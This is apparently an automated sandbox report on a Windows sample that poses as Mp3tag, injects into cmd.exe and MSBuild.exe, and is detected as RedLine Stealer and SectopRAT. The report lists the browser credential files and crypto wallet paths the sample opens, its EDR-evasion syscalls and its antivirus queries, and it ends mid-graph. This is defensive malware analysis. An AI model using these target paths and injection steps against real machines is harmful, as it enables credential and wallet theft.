                            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00007FF7390DA3B8 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF7390DA3B8
                            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00007FF7390DA59C SetUnhandledExceptionFilter,5_2_00007FF7390DA59C
                            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00007FF7390DE7F4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF7390DE7F4
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: page read and write | page guardJump to behavior

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Found direct / indirect Syscall (likely to bypass EDR)
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeNtCreateFile: Direct from: 0x4E4Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeNtAllocateVirtualMemory: Direct from: 0x7FFB1C859635Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeNtAllocateVirtualMemory: Direct from: 0x5C3F50Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeNtProtectVirtualMemory: Direct from: 0x7FFB0BF994F5Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeNtQuerySystemInformation: Direct from: 0x7FFB0BF82143Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeNtCreateNamedPipeFile: Direct from: 0x7FFB1C842E70Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exeNtAllocateVirtualMemory: Direct from: 0x7FFB0C258E14Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeNtAllocateVirtualMemory: Direct from: 0x110Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeNtAllocateVirtualMemory: Direct from: 0x7FFB0BF98E14Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeNtAllocateVirtualMemory: Direct from: 0x7FFB1C858E14Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeNtClose: Direct from: 0x5C18C0
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeNtQuerySystemInformation: Direct from: 0x7FFB1C842143Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeNtAllocateVirtualMemory: Direct from: 0x7FFB0BF99635Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exeNtQuerySystemInformation: Direct from: 0x14DE90Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeNtAllocateVirtualMemory: Direct from: 0xA0A76ACBJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeNtAllocateVirtualMemory: Direct from: 0x553940Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeNtClose: Direct from: 0x2
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeNtQuerySystemInformation: Direct from: 0x14FAE0Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeNtProtectVirtualMemory: Direct from: 0x3Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeNtClose: Direct from: 0x630480
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeNtProtectVirtualMemory: Direct from: 0x6C006CJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exeNtProtectVirtualMemory: Direct from: 0x7FFB2CE826A1Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeNtProtectVirtualMemory: Direct from: 0x7FFB1C8594F5Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeNtCreateNamedPipeFile: Direct from: 0x7FFB0BF82E70Jump to behavior
                            Maps a DLL or memory area into another process
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read writeJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read writeJump to behavior
                            Writes to foreign memory regions
                            Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6BD61000Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 23B008Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6BD61000Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 11D0008Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00007FF7390D5700 SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,GetDlgItemTextW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,swprintf,GetLastError,GetLastError,GetTickCount,swprintf,GetLastError,GetModuleFileNameW,swprintf,CreateFileMappingW,GetCommandLineW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,swprintf,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,swprintf,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetWindowTextW,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EnableWindow,SendMessageW,SetDlgItemTextW,5_2_00007FF7390D5700
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exe "C:\Users\user~1\AppData\Local\Temp\Bijouterie\Mp3tag.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00007FF7390EC9C0 cpuid 5_2_00007FF7390EC9C0
                            Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetNumberFormatW,5_2_00007FF7390D4CE8
                            Source: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,7_2_0081C6F0
                            Source: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,7_2_0081B710
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,9_2_004DC6F0
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,9_2_004DB710
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00007FF7390D8588 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,5_2_00007FF7390D8588
                            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_00007FF7390C3B10 GetVersionExW,5_2_00007FF7390C3B10
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                            Stealing of Sensitive Information

                            barindex
                            Yara detected RedLine Stealer
                            Source: Yara matchFile source: 16.2.cmd.exe.58000c8.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 20.2.MSBuild.exe.1300000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.cmd.exe.54400c8.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.cmd.exe.58000c8.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.cmd.exe.54400c8.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000B.00000002.1779706990.0000000005440000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.2056182127.0000000005800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000014.00000002.2055832534.0000000001302000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 8000, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 1456, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 2868, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 1912, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\umfcpwvoouwjq, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\lcqqpedjyaav, type: DROPPED
                            Yara detected SectopRAT
                            Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 1456, type: MEMORYSTR
                            Found many strings related to Crypto-Wallets (likely being stolen)
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.0000000002581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\walletsLR
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.0000000002581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q5C:\Users\user\AppData\Roaming\Electrum\wallets\*
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.0000000002411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ata% |*| com.liberty.jaxx |*| * |*| True |*| |*|t-
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.0000000002581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.walletLR
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.0000000002581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum\walletsLR
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.0000000002581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.walletLR
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.0000000002581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: qdC:\Users\user\AppData\Roaming\Binance
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.0000000002581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum\walletsLR
                            Source: MSBuild.exe, 0000000E.00000002.2525529925.0000000002581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q9C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                            Tries to harvest and steal browser information (history, passwords, etc)
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                            Tries to steal Crypto Currency Wallets
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                            Source: Yara matchFile source: 16.2.cmd.exe.58000c8.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 20.2.MSBuild.exe.1300000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.cmd.exe.54400c8.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.cmd.exe.58000c8.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.cmd.exe.54400c8.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000B.00000002.1779706990.0000000005440000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.2522571454.00000000006A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.2056182127.0000000005800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000014.00000002.2055832534.0000000001302000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 8000, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 1456, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 2868, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 1912, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\umfcpwvoouwjq, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\lcqqpedjyaav, type: DROPPED

                            Remote Access Functionality

                            barindex
                            Yara detected RedLine Stealer
                            Source: Yara matchFile source: 16.2.cmd.exe.58000c8.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 20.2.MSBuild.exe.1300000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.cmd.exe.54400c8.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.cmd.exe.58000c8.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.cmd.exe.54400c8.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000B.00000002.1779706990.0000000005440000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.2056182127.0000000005800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000014.00000002.2055832534.0000000001302000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 8000, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 1456, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 2868, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 1912, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\umfcpwvoouwjq, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\lcqqpedjyaav, type: DROPPED
                            Yara detected SectopRAT
                            Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 1456, type: MEMORYSTR

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                            Windows Management Instrumentation                            		11
                            DLL Side-Loading                            		1
                            Exploitation for Privilege Escalation                            		1
                            Disable or Modify Tools                            		1
                            OS Credential Dumping                            		1
                            System Time Discovery                            		Remote Services11
                            Archive Collected Data                            		1
                            Ingress Tool Transfer                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts2
                            Command and Scripting Interpreter                            		Boot or Logon Initialization Scripts1
                            Abuse Elevation Control Mechanism                            		1
                            Deobfuscate/Decode Files or Information                            		LSASS Memory3
                            File and Directory Discovery                            		Remote Desktop Protocol3
                            Data from Local System                            		22
                            Encrypted Channel                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
                            DLL Side-Loading                            		1
                            Abuse Elevation Control Mechanism                            		Security Account Manager236
                            System Information Discovery                            		SMB/Windows Admin SharesData from Network Shared Drive11
                            Non-Standard Port                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook211
                            Process Injection                            		3
                            Obfuscated Files or Information                            		NTDS341
                            Security Software Discovery                            		Distributed Component Object ModelInput Capture2
                            Non-Application Layer Protocol                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                            Software Packing                            		LSA Secrets1
                            Process Discovery                            		SSHKeylogging3
                            Application Layer Protocol                            		Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                            DLL Side-Loading                            		Cached Domain Credentials241
                            Virtualization/Sandbox Evasion                            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                            Masquerading                            		DCSync1
                            Application Window Discovery                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job241
                            Virtualization/Sandbox Evasion                            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt211
                            Process Injection                            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1560988 Sample: file.exe Startdate: 22/11/2024 Architecture: WINDOWS Score: 100 56 time.windows.com 2->56 58 shed.dual-low.s-part-0035.t-0009.t-msedge.net 2->58 60 2 other IPs or domains 2->60 68 Suricata IDS alerts for network traffic 2->68 70 Malicious sample detected (through community Yara rule) 2->70 72 Antivirus detection for dropped file 2->72 74 6 other signatures 2->74 10 file.exe 12 2->10         started        13 Mp3tag.exe 1 2->13         started        signatures3 process4 file5 48 C:\Users\user\AppData\...\tak_deco_lib.dll, PE32+ 10->48 dropped 50 C:\Users\user\AppData\Local\...\Mp3tag.exe, PE32+ 10->50 dropped 16 Mp3tag.exe 5 10->16         started        88 Maps a DLL or memory area into another process 13->88 90 Found direct / indirect Syscall (likely to bypass EDR) 13->90 20 cmd.exe 2 13->20         started        signatures6 process7 file8 40 C:\Users\user\AppData\...\tak_deco_lib.dll, PE32+ 16->40 dropped 42 C:\Users\user\AppData\Roaming\...\Mp3tag.exe, PE32+ 16->42 dropped 62 Found direct / indirect Syscall (likely to bypass EDR) 16->62 22 Mp3tag.exe 1 16->22         started        44 C:\Users\user\AppData\Local\...\lcqqpedjyaav, PE32 20->44 dropped 64 Writes to foreign memory regions 20->64 66 Maps a DLL or memory area into another process 20->66 25 MSBuild.exe 1 20->25         started        27 conhost.exe 20->27         started        signatures9 process10 signatures11 84 Maps a DLL or memory area into another process 22->84 86 Found direct / indirect Syscall (likely to bypass EDR) 22->86 29 cmd.exe 4 22->29         started        process12 file13 52 C:\Users\user\AppData\Local\...\umfcpwvoouwjq, PE32 29->52 dropped 92 Writes to foreign memory regions 29->92 94 Found hidden mapped module (file has been removed from 